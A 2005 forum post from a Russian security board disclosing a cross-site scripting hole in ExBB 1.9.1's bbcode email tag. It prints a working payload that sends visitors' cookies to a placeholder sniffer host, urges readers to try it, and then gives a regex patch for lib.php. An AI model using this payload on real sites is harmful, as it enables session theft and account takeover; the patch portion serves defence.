HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу XSS ExBB 1.9.1
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

XSS ExBB 1.9.1
  #1  
Старый 14.04.2005, 01:47
Kihamo
Новичок
Регистрация: 14.01.2005
Сообщений: 4
С нами: 11220468

Репутация: 0
По умолчанию XSS ExBB 1.9.1
Ахтунг!
Недавно в инете появилась инфа о xss в bbcode url, разрабочтик исправил ошибку, но как оказалось не везде =)
И так поехали. Сразу предупрежу, что данная бага работает только в Internet Explorer . Суть состоит в том, что одна из форм записи bbcode email пропускает нужные нам символы, что позволяет выйти за пределы тега. Вот пример XSS
Код:
[ email]'style='display:none;background:url(javascript:document.images[2].src="http://you_sniffer_url/sniffer.php?"+document.cookie)[/email]
Думаю, что где и как все это работает объяснять не надо. Так что дерзайте =)
А теперь инфа добропорядочным юзерам. Раз разработчик думать не хочет, бум думать за него =)
Открываем файл lib.php и в примерно в 588 строке находим такой код
Код:
$post = preg_replace( "#\[email\](\S+?)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post );
и заменяем его на
Код:
$post = preg_replace( "#\[email\]([a-z0-9&\-_.]+?@[\w\-]+\.([\w\-\.]+\.)?[\w]+)\[/email\]#i", "<a href='mailto:\\1'>\\1</a>", $post );
За сим усе.
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.